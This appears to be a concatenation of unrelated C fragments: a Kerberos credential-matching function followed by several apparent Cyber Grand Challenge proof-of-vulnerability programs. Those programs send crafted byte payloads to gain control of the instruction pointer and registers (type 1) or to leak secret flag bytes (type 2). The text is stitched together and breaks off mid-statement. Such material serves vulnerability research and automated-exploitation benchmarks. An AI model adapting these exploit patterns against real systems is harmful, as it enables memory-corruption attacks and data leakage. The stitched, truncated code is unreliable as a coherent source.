krb5_boolean krb5int_cc_creds_match_request(krb5_context context, krb5_flags whichfields, krb5_creds *mcreds, krb5_creds *creds) { if (((set(KRB5_TC_MATCH_SRV_NAMEONLY) && srvname_match(context, mcreds, creds)) || standard_fields_match(context, mcreds, creds)) && (! set(KRB5_TC_MATCH_IS_SKEY) || mcreds->is_skey == creds->is_skey) && (! set(KRB5_TC_MATCH_FLAGS_EXACT) || mcreds->ticket_flags == creds->ticket_flags) && (! set(KRB5_TC_MATCH_FLAGS) || flags_match(mcreds->ticket_flags, creds->ticket_flags)) && (! set(KRB5_TC_MATCH_TIMES_EXACT) || times_match_exact(&mcreds->times, &creds->times)) && (! set(KRB5_TC_MATCH_TIMES) || times_match(&mcreds->times, &creds->times)) && ( ! set(KRB5_TC_MATCH_AUTHDATA) || authdata_match(mcreds->authdata, creds->authdata)) && (! set(KRB5_TC_MATCH_2ND_TKT) || data_match (&mcreds->second_ticket, &creds->second_ticket)) && ((! set(KRB5_TC_MATCH_KTYPE))|| (mcreds->keyblock.enctype == creds->keyblock.enctype))) return TRUE; return FALSE; }
int main(void) { negotiate_type1(0xfbfbfbfb, 0xfbfbfbfb, 2); do { unsigned char *read_00000; unsigned int read_00000_len; unsigned int read_00000_ptr = 0; //**** length read read_00000_len = 260; read_00000 = (unsigned char*)malloc(read_00000_len); int read_00000_res = length_read(0, read_00000, read_00000_len); if (read_00000_res) {} //silence unused variable warning //**** read match data static unsigned char match_00000_00000[] = "\x00\x00\x00\x00\x49\x4e\x49\x54\x53\x54\x41\x52\x54\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00"; read_00000_ptr += data_match(read_00000 + read_00000_ptr, read_00000_len - read_00000_ptr, match_00000_00000, 259); free(read_00000); if (read_00000_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00000_00000[] = "\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x24"; static unsigned int write_00000_00000_len = 13; unsigned char *write_00000 = NULL; unsigned int write_00000_len = 0; write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len); if (write_00000_len > 0) { transmit_all(1, write_00000, write_00000_len); } free(write_00000); } while (0); do { unsigned char *read_00001; unsigned int read_00001_len; unsigned int read_00001_ptr = 0; //**** length read read_00001_len = 260; read_00001 = (unsigned char*)malloc(read_00001_len); int read_00001_res = length_read(0, read_00001, read_00001_len); if (read_00001_res) {} //silence unused variable warning //**** read match data static unsigned char match_00001_00000[] = "\x02\x00\x00\x00\x0a\x50\x61\x79\x6d\x65\x6e\x74\x73\x20\x6d\x61" "\x64\x65\x3a\x20\x30\x30\x30\x30\x30\x30\x30\x30\x0a\x54\x69\x63" "\x6b\x65\x74\x73\x20\x67\x69\x76\x65\x6e\x3a\x20\x30\x30\x30\x30" "\x30\x30\x30\x30\x0a\x43\x6f\x75\x70\x6f\x6e\x73\x20\x75\x73\x65" "\x64\x3a\x20\x30\x30\x30\x30\x30\x30\x30\x30\x0a\x47\x72\x6f\x73" "\x73\x20\x72\x65\x76\x65\x6e\x75\x65\x3a\x20\x30\x30\x30\x30\x30" "\x30\x30\x30\x0a\x4f\x70\x65\x72\x61\x74\x69\x6e\x67\x20\x63\x6f" "\x73\x74\x73\x3a\x20\x30\x30\x30\x30\x30\x30\x30\x30\x0a\x4e\x65" "\x74\x20\x72\x65\x76\x65\x6e\x75\x65\x3a\x20\x30\x30\x30\x30\x30" "\x30\x30\x30\x0a\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00"; read_00001_ptr += data_match(read_00001 + read_00001_ptr, read_00001_len - read_00001_ptr, match_00001_00000, 259); free(read_00001); if (read_00001_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00001_00000[] = "\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x41\x41\x41\x41" "\x41\x41\x41\x41\x24"; static unsigned int write_00001_00000_len = 21; unsigned char *write_00001 = NULL; unsigned int write_00001_len = 0; write_00001 = append_buf(write_00001, &write_00001_len, write_00001_00000, write_00001_00000_len); if (write_00001_len > 0) { transmit_all(1, write_00001, write_00001_len); } free(write_00001); } while (0); do { //*** writing data static unsigned char write_00002_00000[] = "\x00\x00\x00\x00\x00\x00\x00\x00\xf3\xff\xff\xff\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; static unsigned int write_00002_00000_len = 32; unsigned char *write_00002 = NULL; unsigned int write_00002_len = 0; write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len); if (write_00002_len > 0) { transmit_all(1, write_00002, write_00002_len); } free(write_00002); } while (0); do { //*** writing data unsigned char *write_00003 = NULL; unsigned int write_00003_len = 0; write_00003 = append_var("TYPE1_REG", write_00003, &write_00003_len); if (write_00003_len > 0) { transmit_all(1, write_00003, write_00003_len); } free(write_00003); } while (0); do { //*** writing data static unsigned char write_00004_00000[] = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00"; static unsigned int write_00004_00000_len = 84; unsigned char *write_00004 = NULL; unsigned int write_00004_len = 0; write_00004 = append_buf(write_00004, &write_00004_len, write_00004_00000, write_00004_00000_len); if (write_00004_len > 0) { transmit_all(1, write_00004, write_00004_len); } free(write_00004); } while (0); do { //*** writing data unsigned char *write_00005 = NULL; unsigned int write_00005_len = 0; write_00005 = append_var("TYPE1_IP", write_00005, &write_00005_len); if (write_00005_len > 0) { transmit_all(1, write_00005, write_00005_len); } free(write_00005); } while (0); do { //*** writing data static unsigned char write_00006_00000[] = "\x24"; static unsigned int write_00006_00000_len = 1; unsigned char *write_00006 = NULL; unsigned int write_00006_len = 0; write_00006 = append_buf(write_00006, &write_00006_len, write_00006_00000, write_00006_00000_len); if (write_00006_len > 0) { transmit_all(1, write_00006, write_00006_len); } free(write_00006); } while (0); do { unsigned char *read_00002; unsigned int read_00002_len; unsigned int read_00002_ptr = 0; //**** length read read_00002_len = 260; read_00002 = (unsigned char*)malloc(read_00002_len); int read_00002_res = length_read(0, read_00002, read_00002_len); if (read_00002_res) {} //silence unused variable warning //**** read match data static unsigned char match_00002_00000[] = "\x02\x00\x00\x00\x0a\x50\x61\x79\x6d\x65\x6e\x74\x73\x20\x6d\x61" "\x64\x65\x3a\x20\x30\x30\x30\x30\x30\x30\x30\x30\x0a\x54\x69\x63" "\x6b\x65\x74\x73\x20\x67\x69\x76\x65\x6e\x3a\x20\x30\x30\x30\x30" "\x30\x30\x30\x30\x0a\x43\x6f\x75\x70\x6f\x6e\x73\x20\x75\x73\x65" "\x64\x3a\x20\x30\x30\x30\x30\x30\x30\x30\x30\x0a\x47\x72\x6f\x73" "\x73\x20\x72\x65\x76\x65\x6e\x75\x65\x3a\x20\x30\x30\x30\x30\x30" "\x30\x30\x30\x0a\x4f\x70\x65\x72\x61\x74\x69\x6e\x67\x20\x63\x6f" "\x73\x74\x73\x3a\x20\x30\x30\x30\x30\x30\x30\x30\x30\x0a\x4e\x65" "\x74\x20\x72\x65\x76\x65\x6e\x75\x65\x3a\x20\x30\x30\x30\x30\x30" "\x30\x30\x30\x0a\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00"; read_00002_ptr += data_match(read_00002 + read_00002_ptr, read_00002_len - read_00002_ptr, match_00002_00000, 259); free(read_00002); if (read_00002_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00003; unsigned int read_00003_len; unsigned int read_00003_ptr = 0; //**** length read read_00003_len = 260; read_00003 = (unsigned char*)malloc(read_00003_len); int read_00003_res = length_read(0, read_00003, read_00003_len); if (read_00003_res) {} //silence unused variable warning //**** read match data static unsigned char match_00003_00000[] = "\x03\x00\x00\x00\x64\x6f\x6e\x65\x2e\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00"; read_00003_ptr += data_match(read_00003 + read_00003_ptr, read_00003_len - read_00003_ptr, match_00003_00000, 259); free(read_00003); if (read_00003_ptr) {} //silence unused variable warning if any } while (0); }
int main(void) { negotiate_type2(); unsigned char flag[4] = {0, 0, 0, 0}; do { //*** writing data static unsigned char write_00000_00000[] = "\x03\x03\x03\x03"; static unsigned int write_00000_00000_len = 4; unsigned char *write_00000 = NULL; unsigned int write_00000_len = 0; write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len); if (write_00000_len > 0) { transmit_all(1, write_00000, write_00000_len); } free(write_00000); } while (0); do { unsigned char *read_00000; unsigned int read_00000_len; unsigned int read_00000_ptr = 0; //**** length cgc_read read_00000_len = 3; read_00000 = (unsigned char*)malloc(read_00000_len); int read_00000_res = length_read(0, read_00000, read_00000_len); // first 3 byte of flag come from stamp0 for (int i = 0; i < 3; i++) flag[i] = read_00000[i]; if (read_00000_res) {} //silence unused variable warning //**** cgc_read assign to var "stamp0" from slice assign_from_slice("stamp0", read_00000, read_00000_len - read_00000_ptr, 0, 3, 0); free(read_00000); if (read_00000_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00001; unsigned int read_00001_len; unsigned int read_00001_ptr = 0; //**** length cgc_read read_00001_len = 2; read_00001 = (unsigned char*)malloc(read_00001_len); int read_00001_res = length_read(0, read_00001, read_00001_len); if (read_00001_res) {} //silence unused variable warning //**** cgc_read match data static unsigned char match_00001_00000[] = "\x04\x04"; read_00001_ptr += data_match(read_00001 + read_00001_ptr, read_00001_len - read_00001_ptr, match_00001_00000, 2); free(read_00001); if (read_00001_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00001_00000[] = "\x03\x03\x03\x03"; static unsigned int write_00001_00000_len = 4; unsigned char *write_00001 = NULL; unsigned int write_00001_len = 0; write_00001 = append_buf(write_00001, &write_00001_len, write_00001_00000, write_00001_00000_len); if (write_00001_len > 0) { transmit_all(1, write_00001, write_00001_len); } free(write_00001); } while (0); do { unsigned char *read_00002; unsigned int read_00002_len; unsigned int read_00002_ptr = 0; //**** length cgc_read read_00002_len = 3; read_00002 = (unsigned char*)malloc(read_00002_len); int read_00002_res = length_read(0, read_00002, read_00002_len); // 4th byte of flag comes from stamp1 flag[3] = read_00002[0]; if (read_00002_res) {} //silence unused variable warning //**** cgc_read assign to var "stamp1" from slice assign_from_slice("stamp1", read_00002, read_00002_len - read_00002_ptr, 0, 3, 0); free(read_00002); if (read_00002_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00003; unsigned int read_00003_len; unsigned int read_00003_ptr = 0; //**** length cgc_read read_00003_len = 2; read_00003 = (unsigned char*)malloc(read_00003_len); int read_00003_res = length_read(0, read_00003, read_00003_len); if (read_00003_res) {} //silence unused variable warning //**** cgc_read match data static unsigned char match_00003_00000[] = "\x04\x04"; read_00003_ptr += data_match(read_00003 + read_00003_ptr, read_00003_len - read_00003_ptr, match_00003_00000, 2); free(read_00003); if (read_00003_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00002_00000[] = "\x00\x0f\xf0\xff"; static unsigned int write_00002_00000_len = 4; unsigned char *write_00002 = NULL; unsigned int write_00002_len = 0; write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len); if (write_00002_len > 0) { transmit_all(1, write_00002, write_00002_len); } free(write_00002); } while (0); do { unsigned char *read_00004; unsigned int read_00004_len; unsigned int read_00004_ptr = 0; //**** length cgc_read read_00004_len = 2; read_00004 = (unsigned char*)malloc(read_00004_len); int read_00004_res = length_read(0, read_00004, read_00004_len); if (read_00004_res) {} //silence unused variable warning //**** cgc_read match data static unsigned char match_00004_00000[] = "\x04\x17"; read_00004_ptr += data_match(read_00004 + read_00004_ptr, read_00004_len - read_00004_ptr, match_00004_00000, 2); free(read_00004); if (read_00004_ptr) {} //silence unused variable warning if any } while (0); //*** submitting type 2 POV results // submit_type2("flag"); type2_submit(flag, 4); }
int main(void) { negotiate_type2(); do { //*** writing data static unsigned char write_00000_00000[] = "\x69\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x61"; static unsigned int write_00000_00000_len = 14; unsigned char *write_00000 = NULL; unsigned int write_00000_len = 0; write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len); if (write_00000_len > 0) { transmit_all(1, write_00000, write_00000_len); } free(write_00000); } while (0); do { unsigned char *read_00000; unsigned int read_00000_len; unsigned int read_00000_ptr = 0; //**** length read read_00000_len = 4; read_00000 = (unsigned char*)malloc(read_00000_len); int read_00000_res = length_read(0, read_00000, read_00000_len); if (read_00000_res) {} //silence unused variable warning //**** read match data static unsigned char match_00000_00000[] = "\x00\x00\x00\x00"; read_00000_ptr += data_match(read_00000 + read_00000_ptr, read_00000_len - read_00000_ptr, match_00000_00000, 4); free(read_00000); if (read_00000_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00001_00000[] = "\x6d\x25\x42\x2f\xb1\x25\x42\x2f\xb1\x04\x00\x00\x00\x00\x00\x00" "\x00"; static unsigned int write_00001_00000_len = 17; unsigned char *write_00001 = NULL; unsigned int write_00001_len = 0; write_00001 = append_buf(write_00001, &write_00001_len, write_00001_00000, write_00001_00000_len); if (write_00001_len > 0) { transmit_all(1, write_00001, write_00001_len); } free(write_00001); } while (0); do { unsigned char *read_00001; unsigned int read_00001_len; unsigned int read_00001_ptr = 0; //**** length read read_00001_len = 4; read_00001 = (unsigned char*)malloc(read_00001_len); int read_00001_res = length_read(0, read_00001, read_00001_len); if (read_00001_res) {} //silence unused variable warning //**** read match data static unsigned char match_00001_00000[] = "\x00\x00\x00\x00"; read_00001_ptr += data_match(read_00001 + read_00001_ptr, read_00001_len - read_00001_ptr, match_00001_00000, 4); free(read_00001); if (read_00001_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00002_00000[] = "\x3d\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00" "\x00"; static unsigned int write_00002_00000_len = 17; unsigned char *write_00002 = NULL; unsigned int write_00002_len = 0; write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len); if (write_00002_len > 0) { transmit_all(1, write_00002, write_00002_len); } free(write_00002); } while (0); do { unsigned char *read_00002; unsigned int read_00002_len; unsigned int read_00002_ptr = 0; //**** length read read_00002_len = 16; read_00002 = (unsigned char*)malloc(read_00002_len); int read_00002_res = length_read(0, read_00002, read_00002_len); if (read_00002_res) {} //silence unused variable warning //**** read assign to var "TYPE2_VALUE" from slice assign_from_slice("TYPE2_VALUE", read_00002, read_00002_len - read_00002_ptr, 12, 0, 1); free(read_00002); if (read_00002_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00003_00000[] = "\x71\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; static unsigned int write_00003_00000_len = 13; unsigned char *write_00003 = NULL; unsigned int write_00003_len = 0; write_00003 = append_buf(write_00003, &write_00003_len, write_00003_00000, write_00003_00000_len); if (write_00003_len > 0) { transmit_all(1, write_00003, write_00003_len); } free(write_00003); } while (0); //*** delay delay(100); //*** submitting type 2 POV results submit_type2(NULL); }
int main(void) { type1_vals t1vals; type1_negotiate(0xedededed, 0xededede5, 6, &t1vals); // ESI == 6, last byte is going to be off by 8 unsigned int no_ed = 0x12121212; // have to prevent 0xed from each byte of EIP and REG do { //*** writing data static unsigned char write_00000_00000[] = "\x04\xd4\x7e\x00"; static unsigned int write_00000_00000_len = 4; unsigned char *write_00000 = NULL; unsigned int write_00000_len = 0; write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len); if (write_00000_len > 0) { transmit_all(1, write_00000, write_00000_len); } free(write_00000); } while (0); do { //*** writing data static unsigned char write_00001_00000[] = "\x31\x33\x30\x30\x31\x33\x38\x38"; static unsigned int write_00001_00000_len = 8; unsigned char *write_00001 = NULL; unsigned int write_00001_len = 0; write_00001 = append_buf(write_00001, &write_00001_len, write_00001_00000, write_00001_00000_len); if (write_00001_len > 0) { transmit_all(1, write_00001, write_00001_len); } free(write_00001); } while (0); do { //*** writing data static unsigned char write_00002_00000[] = "\x0f\x44\x00\x00\xcd\xcc\x3c\x40\x75\x4d\x68\x49\x65\x4e\x46\x51" "\x5a\x4b\x69\x7a\x62\x57\x6d\x41\x66\x53\x48\x70\x52\x62\x49\x56" "\x57\x4e\x56\x43\x66\x70\x51\x5a\x4c\x78\x6b\x7a\x4f\x7a\x61\x65" "\x77\x64\x56\x56\x54\x78\x43\x56\x6f\x62\x42\x51\x50\x66\x47\x76" "\x75\x64\x45\x51\x74\x4b\x6c\x72\x50\x67\x79\x59\x64\x56\x52\x4d" "\x6c\x50\x55\x57\x58\x41\x57\x4a\x62\x42\x69\x47\x41\x52\x55\x59" "\x77\x77\x59\x54\x58\x44\x43\x55\x42\x7a\x47\x76\x63\x6b\x6f\x52" "\x70\x5a\x69\x6b\x6b\x79\x71\x77\x6b\x67\x61\x66\x58\x6d\x61\x50" "\x56\x74\x52\x47\x45\x54\x62\x63\x41\x42\x43\x44\x45\x46\x47\x48"; static unsigned int write_00002_00000_len = 144; unsigned char *write_00002 = NULL; unsigned int write_00002_len = 0; write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len); if (write_00002_len > 0) { transmit_all(1, write_00002, write_00002_len); } free(write_00002); } while (0); do { // # &desc_copy (EIP) -> JKLM //*** writing data unsigned int eip = t1vals.ipval | no_ed; unsigned char *write_00003 = NULL; unsigned int write_00003_len = 0; write_00003 = append_buf(write_00003, &write_00003_len, (unsigned char*)&eip, 4); if (write_00003_len > 0) { transmit_all(1, write_00003, write_00003_len); } free(write_00003); } while (0); do { // # &p (ESI) -> (N+8)OPQ //*** writing data unsigned int reg = t1vals.regval | no_ed; unsigned char *write_00004 = NULL; unsigned int write_00004_len = 0; write_00004 = append_buf(write_00004, &write_00004_len, (unsigned char*)®, 4); if (write_00004_len > 0) { transmit_all(1, write_00004, write_00004_len); } free(write_00004); } while (0); do { //*** writing data static unsigned char write_00005_00000[] = "\xed"; static unsigned int write_00005_00000_len = 1; unsigned char *write_00005 = NULL; unsigned int write_00005_len = 0; write_00005 = append_buf(write_00005, &write_00005_len, write_00005_00000, write_00005_00000_len); if (write_00005_len > 0) { transmit_all(1, write_00005, write_00005_len); } free(write_00005); } while (0); do { unsigned char *read_00000; unsigned int read_00000_len; unsigned int read_00000_ptr = 0; //**** length cgc_read read_00000_len = 2; read_00000 = (unsigned char*)malloc(read_00000_len); int read_00000_res = length_read(0, read_00000, read_00000_len); if (read_00000_res) {} //silence unused variable warning free(read_00000); if (read_00000_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00006_00000[] = "\xc4\xec\x4e\xee"; static unsigned int write_00006_00000_len = 4; unsigned char *write_00006 = NULL; unsigned int write_00006_len = 0; write_00006 = append_buf(write_00006, &write_00006_len, write_00006_00000, write_00006_00000_len); if (write_00006_len > 0) { transmit_all(1, write_00006, write_00006_len); } free(write_00006); } while (0); do { //*** writing data static unsigned char write_00007_00000[] = "\x31\x33\x30\x30\x31\x33\x38\x38"; static unsigned int write_00007_00000_len = 8; unsigned char *write_00007 = NULL; unsigned int write_00007_len = 0; write_00007 = append_buf(write_00007, &write_00007_len, write_00007_00000, write_00007_00000_len); if (write_00007_len > 0) { transmit_all(1, write_00007, write_00007_len); } free(write_00007); } while (0); do { unsigned char *read_00001; unsigned int read_00001_len; unsigned int read_00001_ptr = 0; //**** length cgc_read read_00001_len = 4; read_00001 = (unsigned char*)malloc(read_00001_len); int read_00001_res = length_read(0, read_00001, read_00001_len); if (read_00001_res) {} //silence unused variable warning free(read_00001); if (read_00001_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00002; unsigned int read_00002_len; unsigned int read_00002_ptr = 0; //**** length cgc_read read_00002_len = 4; read_00002 = (unsigned char*)malloc(read_00002_len); int read_00002_res = length_read(0, read_00002, read_00002_len); if (read_00002_res) {} //silence unused variable warning free(read_00002); if (read_00002_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00003; unsigned int read_00003_len; unsigned int read_00003_ptr = 0; //**** length cgc_read read_00003_len = 145; read_00003 = (unsigned char*)malloc(read_00003_len); int read_00003_res = length_read(0, read_00003, read_00003_len); if (read_00003_res) {} //silence unused variable warning //**** cgc_read match data static unsigned char match_00003_00000[] = "\x75\x4d\x68\x49\x65\x4e\x46\x51\x5a\x4b\x69\x7a\x62\x57\x6d\x41" "\x66\x53\x48\x70\x52\x62\x49\x56\x57\x4e\x56\x43\x66\x70\x51\x5a" "\x4c\x78\x6b\x7a\x4f\x7a\x61\x65\x77\x64\x56\x56\x54\x78\x43\x56" "\x6f\x62\x42\x51\x50\x66\x47\x76\x75\x64\x45\x51\x74\x4b\x6c\x72" "\x50\x67\x79\x59\x64\x56\x52\x4d\x6c\x50\x55\x57\x58\x41\x57\x4a" "\x62\x42\x69\x47\x41\x52\x55\x59\x77\x77\x59\x54\x58\x44\x43\x55" "\x42\x7a\x47\x76\x63\x6b\x6f\x52\x70\x5a\x69\x6b\x6b\x79\x71\x77" "\x6b\x67\x61\x66\x58\x6d\x61\x50\x56\x74\x52\x47\x45\x54\x62\x63" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\xed"; read_00003_ptr += data_match(read_00003 + read_00003_ptr, read_00003_len - read_00003_ptr, match_00003_00000, 145); free(read_00003); if (read_00003_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00004; unsigned int read_00004_len; unsigned int read_00004_ptr = 0; //**** length cgc_read read_00004_len = 2; read_00004 = (unsigned char*)malloc(read_00004_len); int read_00004_res = length_read(0, read_00004, read_00004_len); if (read_00004_res) {} //silence unused variable warning free(read_00004); if (read_00004_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00008_00000[] = "\xff\xff\xff\xff"; static unsigned int write_00008_00000_len = 4; unsigned char *write_00008 = NULL; unsigned int write_00008_len = 0; write_00008 = append_buf(write_00008, &write_00008_len, write_00008_00000, write_00008_00000_len); if (write_00008_len > 0) { transmit_all(1, write_00008, write_00008_len); } free(write_00008); } while (0); do { unsigned char *read_00005; unsigned int read_00005_len; unsigned int read_00005_ptr = 0; //**** length cgc_read read_00005_len = 2; read_00005 = (unsigned char*)malloc(read_00005_len); int read_00005_res = length_read(0, read_00005, read_00005_len); if (read_00005_res) {} //silence unused variable warning free(read_00005); if (read_00005_ptr) {} //silence unused variable warning if any } while (0); }
int main(void) { type1_vals t1vals; type1_negotiate(0xedededed, 0xedededed, 7, &t1vals); // can use either EAX(0) or EDI(7) unsigned int no_ed = 0x12121212; // have to prevent 0xed from each byte of EIP and REG do { //*** writing data static unsigned char write_00000_00000[] = "\xad\xdd\xad\xdd"; static unsigned int write_00000_00000_len = 4; unsigned char *write_00000 = NULL; unsigned int write_00000_len = 0; write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len); if (write_00000_len > 0) { transmit_all(1, write_00000, write_00000_len); } free(write_00000); } while (0); do { //*** writing data static unsigned char write_00001_00000[] = "\x38\x31\x39\x36\x33\x38\x39\x30"; static unsigned int write_00001_00000_len = 8; unsigned char *write_00001 = NULL; unsigned int write_00001_len = 0; write_00001 = append_buf(write_00001, &write_00001_len, write_00001_00000, write_00001_00000_len); if (write_00001_len > 0) { transmit_all(1, write_00001, write_00001_len); } free(write_00001); } while (0); do { //*** writing data static unsigned char write_00002_00000[] = "\x8c\xdc\x00\x00\x14\xae\x07\x41\x47\x71\x56\x59\x4e\x4e\x43\x54" "\x64\x46\x54\x6f\x4a\x67\x62\x6e\x4b\x56\x73\x4e\x72\x4a\x54\x72" "\x42\x45\x44\x65\x50\x57\x7a\x53\x4b\x6a\x51\x51\x68\x75\x53\x6f" "\x74\x75\x71\x49\x4a\x70\x63\x67\x52\x49\x76\x74\x4a\x70\x49\x4d" "\x4c\x4b\x62\x71\x44\x79\x76\x6a\x4f\x53\x41\x47\x66\x75\x46\x6c" "\x4f\x41\x51\x66\x54\x4d\x64\x4e\x4d\x7a\x52\x56\x43\x48\x78\x64" "\x4a\x43\x5a\x53\x4a\x52\x52\x61\x4c\x63\x7a\x43\x41\x69\x6c\x66" "\x4f\x76\x64\x62\x6e\x4b\x6e\x48\x77\x6a\x51\x43\x7a\x6c\x4a\x61" "\x66\x4f\x47\x68\x6a\x5a\x5a\x41"; static unsigned int write_00002_00000_len = 136; unsigned char *write_00002 = NULL; unsigned int write_00002_len = 0; write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len); if (write_00002_len > 0) { transmit_all(1, write_00002, write_00002_len); } free(write_00002); } while (0); do { // EAX (have to prevent 0xed frm each of the 4 bytes) //*** writing data unsigned int reg = t1vals.regval | no_ed; unsigned char *write_00003 = NULL; unsigned int write_00003_len = 0; write_00003 = append_buf(write_00003, &write_00003_len, (unsigned char*)®, 4); if (write_00003_len > 0) { transmit_all(1, write_00003, write_00003_len); } free(write_00003); } while (0); do { //*** writing data static unsigned char 